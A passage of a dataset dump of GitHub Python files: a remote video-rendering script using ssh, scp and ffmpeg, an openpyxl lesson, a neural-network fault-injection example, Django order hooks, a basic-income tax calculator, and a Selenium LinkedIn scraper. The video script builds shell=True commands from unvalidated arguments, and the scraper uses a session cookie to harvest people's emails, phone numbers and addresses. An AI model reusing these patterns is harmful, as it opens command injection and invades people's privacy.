subprocess\n\n\nclass Parser(BaseParser):\n model_name: str\n target_dir: str = \"./videos\"\n name: str = \"video\"\n use_cached_model: bool = False\n deterministic: bool = False\n\n _help = {\n \"model_name\": \"Name of the model to use\",\n \"target_dir\": \"Path to the directory where to save the video\",\n \"name\": \"Name of the video\",\n \"use_cached_model\": \"Whether to use the cached model or not. Only use if you know it exists\",\n \"deterministic\": \"Whether to use deterministic action sampling or not\",\n }\n\n _abbrev = {\n \"model_name\": \"m\",\n \"target_dir\": \"t\",\n \"name\": \"n\",\n \"use_cached_model\": \"uc\",\n \"deterministic\": \"d\",\n }\n\n\nif __name__ == \"__main__\":\n args = Parser()\n\n model_name = args.model_name\n\n if not args.use_cached_model:\n print(\"Downloading model on remote\")\n out1 = subprocess.run(\n f\"ssh -t ariel.geovic 'scp -r jeanzay:/gpfswork/rech/nbk/utu66tc/tb_logs/{model_name} temp/'\",\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n print(out1.stdout.decode(\"utf-8\"))\n print(out1.stderr.decode(\"utf-8\"))\n\n print(\"Generating video on remote\")\n out2 = subprocess.run(\n f\"ssh -t ariel.geovic '/home/ariel/anaconda3/envs/coltra/bin/python /home/ariel/projects/coltra-rl/scripts/enjoy_crowd.py -p /home/ariel/temp/{model_name} -e /home/ariel/projects/coltra-rl/builds/crowd-v6a/crowd.x86_64{' -d' if args.deterministic else ''}'\",\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n print(out2.stdout.decode(\"utf-8\"))\n print(out2.stderr.decode(\"utf-8\"))\n\n print(\"Downloading video on remote\")\n out3 = subprocess.run(\n f\"scp -r ariel.geovic:/home/ariel/temp/video.webm {args.target_dir}\",\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n print(out3.stdout.decode(\"utf-8\"))\n print(out3.stderr.decode(\"utf-8\"))\n\n print(\"Converting video to mp4\")\n out4 = subprocess.run(\n f\"ffmpeg -y -f webm -i {args.target_dir}/video.webm {args.target_dir}/{args.name}.mp4\",\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n print(out4.stdout.decode(\"utf-8\"))\n print(out4.stderr.decode(\"utf-8\"))\n\n print(\"Cleaning up\")\n out5 = subprocess.run(\n f\"rm {args.target_dir}/video.webm\",\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n print(out5.stdout.decode(\"utf-8\"))\n print(out5.stderr.decode(\"utf-8\"))\n\n print(\"Done\")\n","repo_name":"RedTachyon/coltra-rl","sub_path":"scripts/download_video.py","file_name":"download_video.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"11941575635","text":"import openpyxl\n\nwb = openpyxl.load_workbook(r\"D:\\03_demo.xlsx\") # 载入一个工作簿\n\nws1 = wb[\"YorkFish1\"]\nws1.row_dimensions[2].height = 100\nws1.column_dimensions['C'].width = 50\n\nwb.save(r\"D:\\03_demo.xlsx\") # 保存文件,此步需在文件关闭时操作\n\n","repo_name":"YorkFish/learning_notes","sub_path":"Python3/FishC/openpyxl/lesson_03_02.py","file_name":"lesson_03_02.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11776014375","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nimport tensorflow_datasets as tfds\nfrom keras import backend as K\n\nimport os\nimport sys \n\nCLASSES_MODULE_PATH = \"../../../\"\nWEIGHT_FILE_PATH = \"../\"\n\n# appending a path\nsys.path.append(CLASSES_MODULE_PATH) #CHANGE THIS LINE\n\nfrom src.injection_sites_generator import *\n\n\n### How to target a model with skip connection\n# In this example we will show how to use classes to simulate errors\n# targeting a model with skip connections. We define a small unet\n# model with a single skip connection (function build_tiny_unet) and we will target\n# the first convolution after the skip. To do so we need to find the idx of the layer we\n# want to target by passing through the list model.layers, the index we are looking for is 5.\n# The next step consists in defining all the functions needed to perform the injection correctly,\n# this means that we need to manually provide each connection with all the inputs required.\n# Lines 140 - 144 is where we define the following functions\n# 1. get_selected_layer_output: executes the model from the input layer through the selected layer,\n# produces the output of the target layer\n# 2. get_conv2_output: executes the model from the input layer through the second convolutional layer,\n# the output produced will be the first input of the concatenate layer\n# 3. get_input_concatenate: executes the model from the target layer through the one before the concatenate layer,\n# the input for this function must be the corrupted output of the target layer\n# 4. get_final_output: executes the model from the concatenation through the final output.\n#\n# It should be noted that this code doesn't work without some modifications, we currently do not load a real dataset\n# and do not provide an evaluation function for the output which is strictly dependent on the domain of the model.\n\ndef generate_injection_sites(sites_count, layer_type, layer_name, size, models_path, models_mode=''):\n \"\"\"\n models_path: relative path form the pwd to the models folder\n \"\"\"\n injection_site = InjectableSite(layer_type, layer_name, size)\n\n try:\n injection_sites, cardinality, pattern = InjectionSitesGenerator([injection_site], models_mode, models_path) \\\n .generate_random_injection_sites(sites_count)\n except:\n return []\n\n return injection_sites, cardinality, pattern\n\n\ndef double_conv_block(x, n_filters, nameType=None):\n x = layers.Conv2D(n_filters, 3,\n padding=\"same\", activation=\"relu\",\n kernel_initializer=\"he_normal\",\n name=f'conv1_{nameType}_{n_filters}')(x)\n x = layers.Conv2D(n_filters, 3,\n padding=\"same\", activation=\"relu\",\n kernel_initializer=\"he_normal\",\n name=f'conv2_{nameType}_{n_filters}')(x)\n\n return x\n\n\ndef downsample_block(x, n_filters):\n f = double_conv_block(x, n_filters, nameType='downsample')\n p = layers.MaxPool2D(2, name=f'maxpool_{n_filters}')(f)\n p = layers.Dropout(0.3, name=f'dropout_{n_filters}')(p)\n\n return f, p\n\n\ndef upsample_block(x, conv_features, n_filters):\n x = layers.Conv2DTranspose(n_filters, 3, 2, padding=\"same\",\n name=f'upconv_{n_filters}')(x)\n x = layers.concatenate([x, conv_features], name=f'concat_{n_filters}')\n x = layers.Dropout(0.3, name=f'dropout_upsample_{n_filters}')(x)\n x = double_conv_block(x, n_filters, nameType='upsample')\n\n return x\n\n\ndef build_tiny_unet(output_channels):\n inputs = layers.Input(shape=(128, 128, 3), name='input')\n\n f1, p1 = downsample_block(inputs, 32)\n bottleneck = double_conv_block(p1, 64, nameType='bottleneck')\n u1 = upsample_block(bottleneck, f1, 32)\n outputs = layers.Conv2D(output_channels, 1, padding=\"same\", activation=\"softmax\",\n name='output')(u1)\n unet_model = tf.keras.Model(inputs, outputs, name=\"U-Net\")\n return unet_model\n\n\ndef load_images():\n \"\"\"\n Dummy function, it should load the dataset that the model should use\n \"\"\"\n return 0\n\n\ndef evaluate_output(val):\n \"\"\"\n Dummy function, it should evaluate the obtained output based on a metric chosen by the developer\n \"\"\"\n return 0\n\n\ndef main():\n path_weights = os.path.join(WEIGHT_FILE_PATH,'weights.h5')\n print(f\"Load weights from => {path_weights}\")\n model = keras.models.load_model('../tiny_unet.h5', compile=False)\n\n img = load_images()\n selected_layer_idx = 5\n conv2_idx = 2\n conv2d_transpose_idx = 7\n concatenate_idx = 8\n\n get_selected_layer_output = K.function([model.layers[0].input], [model.layers[selected_layer_idx].output])\n get_conv2_output = K.function([model.layers[0].input], [model.layers[conv2_idx].output])\n get_input_concatenate = K.function([model.layers[selected_layer_idx + 1].input],\n [model.layers[conv2d_transpose_idx].output])\n get_final_output = K.function([model.layers[concatenate_idx].input], [model.layers[-1].output])\n\n selected_layer_output = get_selected_layer_output(img)\n\n injection_site, cardinality, pattern = generate_injection_sites(1, OperatorType['Conv2D'], '',\n '(None, 64, 64, 64)', models_path='models')\n\n if len(injection_site) > 0:\n for idx, value in injection_site[0].get_indexes_values():\n channel_last_idx = (idx[0], idx[2], idx[3], idx[1])\n if value.value_type == '[-1,1]':\n selected_layer_output[channel_last_idx] += value.raw_value\n else:\n selected_layer_output[channel_last_idx] = value.raw_value\n\n conv2_output = get_conv2_output(img)\n input_concatenate = get_input_concatenate(selected_layer_output)\n final_output = get_final_output([conv2_output, input_concatenate])\n\n evaluate_output(final_output)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"D4De/classes","sub_path":"examples/tensorflow2/as_a_function/small_unet.py","file_name":"small_unet.py","file_ext":"py","file_size_in_byte":6059,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"3623920872","text":"import locale\nfrom datetime import datetime\n\nfrom .models import Order\n\n\n@Order.State.PROCESSING.register_hook(\"before\")\ndef validate_payment_method(order: Order, payment_method=None, **kwargs):\n if payment_method not in (\"cash\", \"card\"):\n raise ValueError(f\"Invalid payment method: {payment_method}\")\n order.metadata[\"payment_method\"] = payment_method\n\n\n@Order.State.PROCESSING.register_hook(\"before\")\ndef apply_discount(order: Order, discount=None, **kwargs):\n if discount is None:\n return\n\n if not 0 <= discount <= 100:\n raise ValueError(f\"Invalid discount percentage: {discount}\")\n\n order.price = order.price * (1 - discount / 100)\n order.metadata[\"discount\"] = discount\n\n\n@Order.State.PROCESSING.register_hook(\"after\")\ndef notify_payment_success(order: Order, payment_method, **kwargs):\n print(f\"\\u001b[32mPayment for order #{order.id} successful!\")\n print(f\"\\u001b[32mTotal: {order.price} (paid with {payment_method})\")\n\n\n@Order.State.OUT_FOR_DELIVERY.register_hook(\"before\")\ndef validate_delivery_date(order: Order, delivery_date=None, **kwargs):\n if delivery_date is None:\n raise ValueError(\"Delivery date is required\")\n\n parsed_date = datetime.fromisoformat(delivery_date)\n if parsed_date < datetime.now():\n raise ValueError(\"Delivery date must be in the future\")\n\n order.metadata[\"delivery_date\"] = delivery_date\n\n\n@Order.State.OUT_FOR_DELIVERY.register_hook(\"after\")\ndef notify_out_for_delivery(order: Order, delivery_date, **kwargs):\n locale.setlocale(locale.LC_ALL, \"\")\n parsed_date = datetime.fromisoformat(delivery_date)\n print(f\"\\u001b[32mOrder #{order.id} is out for delivery!\")\n print(f\"\\u001b[32mDelivery date: {parsed_date:%c}\")\n\n\n@Order.State.DELIVERED.register_hook(\"after\")\ndef notify_delivery_success(order: Order, **kwargs):\n print(f\"\\u001b[32mOrder #{order.id} delivered successfully!\")\n\n\n@Order.State.CANCELLED.register_hook(\"after\")\n@Order.State.REFUNDED.register_hook(\"after\")\ndef send_questionnaire(order: Order, **kwargs):\n print(\"\\u001b[32mWe're sad to see you go! Please fill out this questionnaire:\")\n qr_code = \"\"\"\n ┌─────────────────────────────────────┐\n │ │\n │ ▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ │\n │ █ ▄▄▄ █ ▄ ▄▄█▄ ▀█ ▄ █ ▄▄▄ █ │\n │ █ ███ █ ██▄█ █ █▀▀▀█ █ ███ █ │\n │ █▄▄▄▄▄█ ▄▀▄ █▀▄ ▄▀█▀█ █▄▄▄▄▄█ │\n │ ▄▄▄▄ ▄ ▄▀ ▀ ▄▄▀▀███▀▄ ▄▄▄ ▄ │\n │ ▄▄█▄█▀▄▀▄▀ ▄▀ █ ▄▀█ ███ ▄▄▀ │\n │ █▄█▀▄▄▀ ▄ █▀██▄█▄▀▄▀▀▀▀▀▄▄ ▀ │\n │ █▀▄▀██▄ ▀▄█▀▄ █ █▀ ██▄▀█▄ ███ │\n │ █▀▄██ ▄ ▀ ▄▄▀ ▀▀▀ ▄ █▄▀▀█▄ █ │\n │ ▄▀▀▄▀ ▄▀██▄▄█ ▀█▄ ▀ ▀▀ █ ▀█▀ │\n │ ▄▀█▀▀▄▄▄▄▄▄█ █▄▀█▄███▄▄▄▄█ │\n │ ▄▄▄▄▄▄▄ ▀██▄█▄▄ ▀▄█ ▄ ██▀█▀ │\n │ █ ▄▄▄ █ ▀▄ ▄▀██▄▄▀ █▄▄▄█▀▄█▄ │\n │ █ ███ █ █ ▄█▀▄ ▀▀ ▀▀█ ▄▀▀▄ █ │\n │ █▄▄▄▄▄█ █ ▀ █▄█ ▀██ ▀ █ █ │\n │ │\n └─────────────────────────────────────┘\n \"\"\"\n print(\"\\r\\n\".join(f\"\\u001b[30m\\u001b[47m{l.strip()}\\u001b[0m\" for l in qr_code.splitlines()))\n","repo_name":"hassanselim0/django-state-machine-demo","sub_path":"django_state_machine_demo/orders/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43107598213","text":"## Author: Jessica Chew\n## Version: 0.0.0.0\n## Date: 10 April 2023\n##############################################\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\nimport streamlit as st\n##############################################\n\nst.set_page_config(layout=\"wide\")\n\n## UBI section ## experimental\nst.header(\"Easily estimate how you could benefit from a Universal Basic Income\")\nst.subheader(\"BASIC INCOME AUSTRALIA - EXPERIMENTAL POLICY MODELLING TOOL\")\nst.write(\"BIA proposes a AUD 500/week (26,000/year) universal basic income paid to every adult 18+ years in Australia without conditions or targeting (details TBC)\")\nst.write(\"The BIA policy recovers the UBI payment at 32.26 percent of an individual's gross salary up to 80,600. The 32.26 percent clawback rate was chosen as it represents the dollar amount of annual UBI paid to an individual out of the 80,600 per year threshold. (32.26% = 26,000/80,600)\")\nst.write(\"This means an 80,600 per annum salary is the threshold at which an individual ceases to be a net beneficiary.\")\nst.write(\"If you earn more than 80,600 a year, it means you will still receive the regular UBI payment like everyone else however the full UBI payment ($26K) will be recovered through the group tax system.\")\nst.write(\"If you earn less than 80,600 a year, you become a net UBI beneficiary on a sliding scale. This means, the more you earn, the lower the proportion of the $500/week UBI you will receive. The less you earn, the more of the UBI payment you get to keep.\")\nst.write(\"See what UBI means for you by entering your annual salary.\")\n\n\n# Income input\npi = st.number_input (\"What is your annual personal income?\" , value = 20000) ## Default to $20K for now. Future idea: show nothing until the user inputs a salary\n\n# Calculate barebones personal income tax for FY 2022-2023\n# https://www.ato.gov.au/Rates/Individual-income-tax-rates/\ndef tax_payable(pi):\n if ((pi > 0) and (pi <= 18200)):\n tax = 0\n elif ((pi >= 18201) and (pi <= 45000)):\n tax = (pi - 18200) * 0.19\n elif ((pi >= 45001) and (pi <= 120000)):\n tax = ((pi - 45000) * 0.325) + 5092\n elif ((pi >= 120001) and (pi <= 180000)):\n tax = ((pi - 120000) * 0.37) + 29467\n elif pi >= 180001:\n tax = ((pi - 180000) * 0.45) + 51667\n return(tax)\n\n#tax_payable(60000)\n\n\n## Set up the outputs at different time levels\n\n## Basic income payment\nweekly_ubi_level = 500\nannual_ubi = weekly_ubi_level*52\nweekly_ubi = weekly_ubi_level\nfornightly_ubi = weekly_ubi_level*2\n\n##Basic income clawback level\nclawback_amount = 26000\n\n## Tax payable\nannual_tax_payable = round(tax_payable(pi),0)\nweekly_tax_payable = round((tax_payable(pi))/52,0)\nfortnightly_tax_payable = round((tax_payable(pi))/26,0)\n\n## Gross earned income\nannual_gross_income = round(pi,0)\nweekly_gross_income = round((pi/52),0)\nfortnightly_gross_income = round((pi/26),0)\n\n## Net earned income\nannual_net_income = round(pi-(tax_payable(pi)),0)\nweekly_net_income = round((pi-(tax_payable(pi)))/52,0)\nfortnightly_net_income = round((pi-(tax_payable(pi)))/26,0)\n\n## UBI recovery \"clawback\" function\ndef clawback(annual_gross_income):\n if (annual_gross_income > 80600):\n clawback = clawback_amount\n elif (annual_gross_income <= 80600):\n clawback = round(annual_gross_income * 0.3226 ,0)\n return(clawback)\n\nnet_ubi_benefit = clawback_amount - clawback(annual_gross_income) \n\ndef ubi_recovery_explainer(annual_gross_income):\n if (annual_gross_income > 80600):\n explainer = \"(Because your salary exceeds the annual threshold the whole basic income is recaptured)\"\n elif (annual_gross_income <= 80600):\n explainer = \"($\" + str(round(annual_gross_income,0)) + \" x 32.26%)\"\n return(explainer)\n\nnet_benefit = annual_net_income + net_ubi_benefit\n\ndef net_benefit_explainer(annual_gross_income):\n if (annual_gross_income > 80600):\n explainer = \"Because your salary exceeds the annual threshold you do not receive a net UBI benefit but neither are you worse off (your annual net take home pay in both scenarios is the same) \" ## not to mention potential interest rate gains from being paid a UBI in advance?!?!?\n elif (annual_gross_income <= 80600):\n explainer = \"You are \" + str(net_benefit - annual_net_income) + \" dollars ahead compared to not receiving a 500 dollar/week UBI\" + \" (\" + str(round(net_benefit,0)) + \"-\" + str(round(annual_net_income,0)) +\")\"\n return(explainer)\n\n\n\n\n\n## Set up the two columns\ncol1, col2 = st.columns(2)\n\nwith col1:\n st.subheader('Current personal income taxation regime (no UBI)')\n st.write(\"Annual gross income:\" , pi )\n st.write(\"Annual tax payable:\" , annual_tax_payable , \"or\" , round((annual_tax_payable/pi)*100,0) , \"percent of your income\")\n st.write(\"Annual net take home pay:\" , annual_net_income)\n st.markdown(\"\"\" Tax calculations are based on the ATO 2022-2023 personal income tax schedule: https://www.ato.gov.au/rates/individual-income-tax-rates/\"\"\", unsafe_allow_html=True)\n st.markdown(\"\"\" Note: This calculator does not cover any HECS-HELP repayments, Medicare levy, Medicare levy surcharge, working holiday makers' tax obligations nor the First Home Super Saver (FHSS) scheme. It simply models the latest Australian personal income tax structure assuming you were a full-year resident for tax purposes.\"\"\", unsafe_allow_html=True)\n \nwith col2:\n st.subheader(\"BIA's Proposed UBI mechanism\")\n st.write(\"Annual gross income:\" , pi )\n st.write(\"Annual tax payable:\" , annual_tax_payable , \"or\" , round((annual_tax_payable/pi)*100,0) , \"percent of your income\")\n st.write(\"UBI recovery amount:\" , clawback(annual_gross_income) , ubi_recovery_explainer(annual_gross_income)) \n st.write(\"Net UBI\" , net_ubi_benefit , \"(\" , \"$26000 -\" , clawback(annual_gross_income) ,\")\")\n st.write(\"Annual net take home pay + net UBI\" , net_benefit, \"(\" , annual_net_income , \"+\" , net_ubi_benefit, \")\")\n netbenexp = net_benefit_explainer(annual_gross_income)\n style = \"{}\".format(netbenexp)\n st.markdown(style, unsafe_allow_html=True)\n st.markdown(\"\"\" Calculator prepared by Jessica Chew | [jessicacychew.com](https://jessicacychew.com) | [GitHub](https://github.com/jessicacychew/bia_policy_model)\"\"\", unsafe_allow_html=True)\n\n \n\n## next steps (from 9 April 2023 onwards)\n## Finesse the blurb\n## Finesse the code labels to accord with the accounting language\n## Make sure there are no errors when the page first loads (and there's no income input yet)\n## Figure out versioning structure - official\n## Add link to Git\n## Publish\n## Share with Michael alongside list of next steps and ideas\n## e.g., model line graph, do different scenarios with HECs, people receiving DSP etc and also different time drop downs, add language about two-part tax, add colour\n## feedback form\n## drop down for code like UBI center\n\n\n","repo_name":"jessicacychew/bia_policy_model","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43606049832","text":"import logging\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nLINKED_IN_URL = 'https://www.linkedin.com/'\nSKILLS_SHOW_MORE_BUTTON_XPATH = '.pv-profile-section__card-action-bar.pv-skills-section__additional-skills.artdeco-container-card-action-bar.artdeco-button.artdeco-button--tertiary.artdeco-button--3.artdeco-button--fluid'\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass LinkedInScraper:\n def __init__(self, _cookie):\n self.driver_options = webdriver.ChromeOptions()\n self.driver = None\n\n self.cookie = _cookie\n\n def init_driver(self):\n logging.info('Initializing the web driver')\n\n self.driver_options.add_argument('--log-level=3')\n self.driver_options.add_argument('--disable-logging')\n # self.driver_options.add_argument('--headless')\n\n # self.driver_options.add_experimental_option('prefs', {\n # 'profile.managed_default_content_settings.images': 2\n # })\n\n try:\n self.driver = webdriver.Chrome(chrome_options=self.driver_options)\n except:\n logging.error('Couldn\\'t Initialize the web driver')\n\n def set_login_cookie(self):\n self.driver.add_cookie({'name': 'li_at', 'value': self.cookie})\n\n def login(self):\n self.driver.get(LINKED_IN_URL)\n self.set_login_cookie()\n self.driver.get(LINKED_IN_URL)\n\n input_field = self.driver.find_elements_by_class_name('input__field')\n\n if len(input_field) > 0:\n logging.error('Invalid cookie')\n\n self.driver.close()\n\n def text_or_none(self, element):\n if element:\n return element.text\n\n return \"\"\n\n def wait_for(self, css_selector):\n try:\n return WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, css_selector))\n )\n except:\n return None\n\n def get_element(self, css_selector, parent=None):\n elements = []\n\n if parent:\n elements = parent.find_elements_by_css_selector(css_selector)\n else:\n elements = self.driver.find_elements_by_css_selector(css_selector)\n\n if len(elements) > 0:\n return elements[0]\n\n return None\n\n def get_user_data(self):\n user_profile = {}\n\n user_profile['fullname'] = self.text_or_none(\n self.driver.find_element_by_css_selector('.pv-top-card--list > li'))\n user_profile['title'] = self.text_or_none(self.driver.find_element_by_css_selector('.ph5.pb5 .mt1'))\n user_profile['photo'] = self.driver.find_element_by_css_selector(\n '.profile-photo-edit__preview.ember-view').get_attribute('src')\n\n about_show_more = self.driver.find_element_by_css_selector('#line-clamp-show-more-button')\n\n if about_show_more:\n self.driver.execute_script(\n 'arguments[0].click()', about_show_more)\n\n user_profile['about'] = self.text_or_none(\n self.driver.find_element_by_css_selector('.pv-about__summary-text.mt4.t-14.ember-view'))\n\n self.driver.find_element_by_css_selector(\"a[data-control-name='contact_see_more']\").click()\n\n linkedin_url_element = self.wait_for('.ci-vanity-url a')\n linkedin_url = linkedin_url_element.get_attribute('href')\n\n user_profile['linkedin_username'] = linkedin_url.split('/')[-1]\n user_profile['linkedin_link'] = linkedin_url\n\n email_element = self.get_element('.ci-email a')\n user_profile['email'] = self.text_or_none(email_element)\n\n location_element = self.get_element('.ci-address a')\n user_profile['location'] = self.text_or_none(location_element)\n\n websites_element = self.get_element('.ci-websites')\n user_profile['websites'] = {}\n\n for website in websites_element.find_elements_by_css_selector('li'):\n website_link = website.find_element_by_css_selector('a').get_attribute('href')\n website_type = self.text_or_none(website.find_element_by_css_selector('span')) \\\n .strip().replace('(', '').replace(')', '').lower()\n\n user_profile['websites'][website_type] = website_link\n\n numbers_element = self.get_element('.ci-phone')\n user_profile['numbers'] = {}\n\n for phone in numbers_element.find_elements_by_css_selector('li'):\n phone_number = self.text_or_none(phone.find_elements_by_css_selector('span')[0])\n phone_type = self.text_or_none(phone.find_elements_by_css_selector('span')[1]) \\\n .strip().replace('(', '').replace(')', '').lower()\n\n user_profile['numbers'][phone_type] = phone_number\n\n self.driver.find_element_by_css_selector(\"button.artdeco-modal__dismiss\").click()\n\n return user_profile\n\n def get_skills(self):\n skills = []\n\n skills_show_more_button = self.driver.find_elements_by_css_selector(\n SKILLS_SHOW_MORE_BUTTON_XPATH)\n\n while len(skills_show_more_button) <= 0:\n skills_show_more_button = self.driver.find_elements_by_css_selector(\n SKILLS_SHOW_MORE_BUTTON_XPATH)\n\n self.driver.execute_script(\n 'arguments[0].click()', skills_show_more_button[0])\n\n top_skills_list = self.driver.find_elements_by_css_selector(\n '.pv-skill-category-entity__top-skill .pv-skill-category-entity__name')\n\n skills.append({\n \"type\": \"Top Skills\",\n \"skills\": [\n el.text for el in\n top_skills_list]\n })\n\n skills_list = self.driver.find_elements_by_css_selector(\n '.pv-skill-category-list.pv-profile-section__section-info')\n\n for skills_category in skills_list:\n skill_title = skills_category.find_element_by_css_selector(\n '.pv-skill-categories-section__secondary-skill-heading').text\n\n skills.append({\n \"type\": skill_title,\n \"skills\": [\n el.text for el in\n skills_category.find_elements_by_class_name('pv-skill-category-entity__name-text')]\n })\n\n return skills\n\n def get_educations(self):\n educations = []\n\n educations_list = self.driver.find_elements_by_css_selector(\n '#education-section ul > .ember-view')\n\n for education in educations_list:\n school_name_el = education.find_elements_by_class_name(\n 'pv-entity__school-name')\n degree_name_el = education.find_elements_by_class_name(\n 'pv-entity__degree-name')\n field_of_study_el = education.find_elements_by_class_name(\n 'pv-entity__fos')\n dates_el = education.find_elements_by_css_selector(\n '.pv-entity__dates')\n\n school_name = \"\"\n degree_name = \"\"\n field_of_study = \"\"\n start_date = \"\"\n end_date = \"\"\n\n if len(school_name_el) > 0:\n school_name = school_name_el[0].text\n\n if len(degree_name_el) > 0:\n degree_name = degree_name_el[0].find_element_by_class_name(\n 'pv-entity__comma-item').text\n\n if len(field_of_study_el) > 0:\n field_of_study = field_of_study_el[0].find_element_by_class_name(\n 'pv-entity__comma-item').text\n\n if len(dates_el) > 0:\n dates = dates_el[0].find_elements_by_css_selector('time')\n\n start_date = dates[0].text if len(dates) > 0 else \"\"\n end_date = dates[1].text if len(dates) > 1 else \"\"\n\n educations.append({\n \"schoolName\": school_name,\n \"degreeName\": degree_name,\n \"fieldOfStudy\": field_of_study,\n \"startDate\": start_date,\n \"endDate\": end_date\n })\n\n return educations\n\n def get_experiences(self):\n experiences = []\n\n experience_list = self.driver.find_elements_by_css_selector(\n '#experience-section ul > .ember-view')\n\n for experience in experience_list:\n title_el = experience.find_elements_by_css_selector('h3')\n company_el = experience.find_elements_by_css_selector(\n '.pv-entity__secondary-title')\n description_el = experience.find_elements_by_css_selector(\n '.pv-entity__description')\n location_el = experience.find_elements_by_css_selector(\n '.pv-entity__location span:nth-child(2)')\n date_range_el = experience.find_elements_by_css_selector(\n '.pv-entity__date-range span:nth-child(2)')\n\n title = \"\"\n company = \"\"\n description = \"\"\n location = \"\"\n start_date = \"\"\n end_date = \"\"\n\n if len(title_el) > 0:\n title = title_el[0].text\n\n if len(company_el) > 0:\n company = company_el[0].text\n\n if len(description_el) > 0:\n description = description_el[0].text\n\n if len(location_el) > 0:\n location = location_el[0].text\n\n if len(date_range_el) > 0:\n dates = date_range_el[0].text.split('–')\n\n start_date = dates[0] if len(dates) > 0 else \"\"\n end_date = dates[1] if len(dates) > 1 else \"\"\n\n experiences.append({\n \"title\": title,\n \"company\": company,\n \"description\": description,\n \"location\": location,\n \"start_date\": start_date,\n \"end_date\": end_date\n })\n\n return experiences\n\n def get_projects(self):\n projects = []\n\n expand_button = self.wait_for('button[aria-controls=\"projects-expandable-content\"]')\n\n if not expand_button:\n return []\n\n self.driver.execute_script('arguments[0].click()', expand_button)\n\n show_more_button = self.get_element(\n '#projects-expandable-content .pv-profile-section__see-more-inline')\n\n if show_more_button:\n self.driver.execute_script('arguments[0].click()', show_more_button)\n\n projects_list = self.driver.find_elements_by_css_selector(\n '#projects-expandable-content ul > .ember-view')\n\n for project in projects_list:\n title = \"\"\n description = \"\"\n external_link = \"\"\n start_date = \"\"\n end_date = \"\"\n\n title_el = self.get_element('.pv-accomplishment-entity__title', project)\n\n if title_el:\n self.driver.execute_script('arguments[0].remove()', title_el.find_element_by_css_selector('span'))\n title = self.text_or_none(title_el)\n\n description_el = self.get_element('.pv-accomplishment-entity__description', project)\n\n if description_el:\n self.driver.execute_script('arguments[0].remove()', description_el.find_element_by_css_selector('div'))\n description = self.text_or_none(description_el)\n\n external_link_el = self.get_element('.pv-accomplishment-entity__external-source', project)\n\n if external_link_el:\n external_link = external_link_el.get_attribute('href')\n\n date_range_el = self.get_element('.pv-accomplishment-entity__date', project)\n\n if date_range_el:\n dates = self.text_or_none(date_range_el).split('–')\n\n start_date = dates[0] if len(dates) > 0 else \"\"\n end_date = dates[1] if len(dates) > 1 else \"\"\n\n projects.append({\n \"title\": title,\n \"description\": list(map(lambda x: {\"bullet\": x}, description.split('\\n'))),\n \"external_link\": external_link,\n \"start_date\": start_date.strip(),\n \"end_data\": end_date.strip()\n })\n\n return projects\n\n def parse_profile(self, profile_url):\n user_data = {}\n\n logging.info(f'Parsing {profile_url}')\n\n self.driver.get(profile_url)\n\n user_data['user_profile'] = self.get_user_data()\n\n self.driver.execute_script(\n \"window.scrollTo(0, document.body.scrollHeight);\")\n\n see_more_buttons = self.driver.find_elements_by_css_selector(\n 'button.pv-profile-section__see-more-inline.pv-profile-section__text-truncate-toggle.link')\n\n for see_more_button in see_more_buttons:\n self.driver.execute_script('arguments[0].click()', see_more_button)\n\n user_data[\"educations\"] = self.get_educations()\n user_data[\"skills\"] = self.get_skills()\n user_data[\"experiences\"] = self.get_experiences()\n user_data[\"projects\"] = self.get_projects()\n\n return user_data\n","repo_name":"oussama1598/linkedin_resume","sub_path":"app/modules/linked_in_scraper.py","file_name":"linked_in_scraper.py","file_ext":"py","file_size_in_byte":13003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70212713445","text":"from decimal import *\r\n\r\n\r\ndef main():\r\n global A, B, C, PI\r\n getcontext().prec = 60\r\n getcontext().rounding = ROUND_HALF_UP\r\n A, B, C = map(Decimal, input().split())\r\n PI = Decimal('3.14159265358979323846264338327950288419716939937510')\r\n print(round(find_sol(), 6))\r\n\r\n\r\ndef sin(x: Decimal) -> Decimal:\r\n x = x % (2 * PI)\r\n i, lasts, s, fact, num, sign = 1, 0, x, 1, x, 1\r\n while s != lasts:\r\n lasts = s\r\n i += 2\r\n fact *= i * (i - 1)\r\n num *= x * x\r\n sign *= -1\r\n s += num / fact * sign\r\n return +s\r\n\r\n\r\ndef f(t: Decimal) -> Decimal:\r\n return A * t + B * sin(t)\r\n\r\n\r\ndef find_sol():\r\n upper = Decimal('2000000')\r\n lower = Decimal('0')\r\n\r\n while abs(upper - lower) > Decimal(10**-25):\r\n mid = (upper + lower) / 2\r\n if f(mid) < C:\r\n lower = mid\r\n else:\r\n upper = mid\r\n\r\n return upper\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"SeungWoo-You/PS","sub_path":"백준/Diamond/13705. 